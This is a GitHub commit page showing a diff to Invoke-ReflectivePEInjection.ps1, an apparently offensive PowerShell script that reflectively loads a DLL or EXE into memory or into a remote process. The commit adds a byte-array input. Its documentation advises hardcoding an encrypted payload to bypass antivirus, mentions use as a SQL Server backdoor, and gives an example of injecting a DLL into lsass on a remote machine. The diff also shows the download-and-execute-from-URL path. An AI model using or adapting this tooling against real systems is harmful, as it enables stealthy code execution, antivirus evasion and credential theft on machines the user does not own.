Skip to content
This repository was archived by the owner on Jan 21, 2021. It is now read-only.

Commit 93bc214

Browse files
clymb3rclymb3r
committed
Adding PEBytes parameter
Added PEBytes parameter for reflectively loading a PE file passed as a byte array to the script.
1 parent 90a05de commit 93bc214

File tree

1 file changed

+17
-5
lines changed

1 file changed

+17
-5
lines changed

CodeExecution/Invoke-ReflectivePEInjection.ps1

+17-5
Original file line numberDiff line numberDiff line change
@@ -23,7 +23,7 @@ from the DLL. The script doesn't wait for the DLL to complete execution, and doe
2323
remote process.
2424
2525
26-
While this script provides functionality to specify a file to load from disk or from a URL, these are more for demo purposes. The way I'd recommend using the script is to create a byte array
26+
While this script provides functionality to specify a file to load from disk a URL, or a byte array, these are more for demo purposes. The way I'd recommend using the script is to create a byte array
2727
containing the file you'd like to reflectively load, and hardcode that byte array in to the script. One advantage of doing this is you can encrypt the byte array and decrypt it in memory, which will
2828
bypass A/V. Another advantage is you won't be making web requests. The script can also load files from SQL Server and be used as a SQL Server backdoor. Please see the Casaba
2929
blog linked below (thanks to whitey).
@@ -33,7 +33,7 @@ Author: Joe Bialek, Twitter: @JosephBialek
3333
License: BSD 3-Clause
3434
Required Dependencies: None
3535
Optional Dependencies: None
36-
Version: 1.3
36+
Version: 1.4
3737
3838
.DESCRIPTION
3939
@@ -47,6 +47,10 @@ The path of the DLL/EXE to load and execute. This file must exist on the compute
4747
4848
A URL containing a DLL/EXE to load and execute.
4949
50+
.PARAMETER PEBytes
51+
52+
A byte array containing a DLL/EXE to load and execute.
53+
5054
.PARAMETER ComputerName
5155
5256
Optional, an array of computernames to run the script on.
@@ -107,6 +111,11 @@ Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs "Arg1 Arg2 Arg3 Arg4"
107111
Refectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer.
108112
Invoke-ReflectivePEInjection -PEPath DemoDLL_RemoteProcess.dll -ProcName lsass -ComputerName Target.Local
109113
114+
.EXAMPLE
115+
116+
Load a PE from a byte array.
117+
Invoke-ReflectivePEInjection -PEPath (Get-Content c:\DemoEXE.exe -Encoding Byte) -ExeArgs "Arg1 Arg2 Arg3 Arg4"
118+
110119
.NOTES
111120
GENERAL NOTES:
112121
The script has 3 basic sets of functionality:
@@ -182,6 +191,11 @@ Param(
182191
[Parameter(ParameterSetName = "WebFile", Position = 0, Mandatory = $true)]
183192
[Uri]
184193
$PEUrl,
194+
195+
[Parameter(ParameterSetName = "Bytes", Position = 0, Mandatory = $true)]
196+
[ValidateNotNullOrEmpty()]
197+
[Byte[]]
198+
$PEBytes,
185199

186200
[Parameter(Position = 1)]
187201
[String[]]
@@ -2886,14 +2900,12 @@ Function Main
28862900

28872901
Write-Verbose "PowerShell ProcessID: $PID"
28882902

2889-
[Byte[]]$PEBytes = $null
2890-
28912903
if ($PsCmdlet.ParameterSetName -ieq "LocalFile")
28922904
{
28932905
Get-ChildItem $PEPath -ErrorAction Stop | Out-Null
28942906
[Byte[]]$PEBytes = [System.IO.File]::ReadAllBytes((Resolve-Path $PEPath))
28952907
}
2896-
else
2908+
elseif ($PsCmdlet.ParameterSetName -ieq "WebFile")
28972909
{
28982910
$WebClient = New-Object System.Net.WebClient
28992911

0 commit comments

Comments
 (0)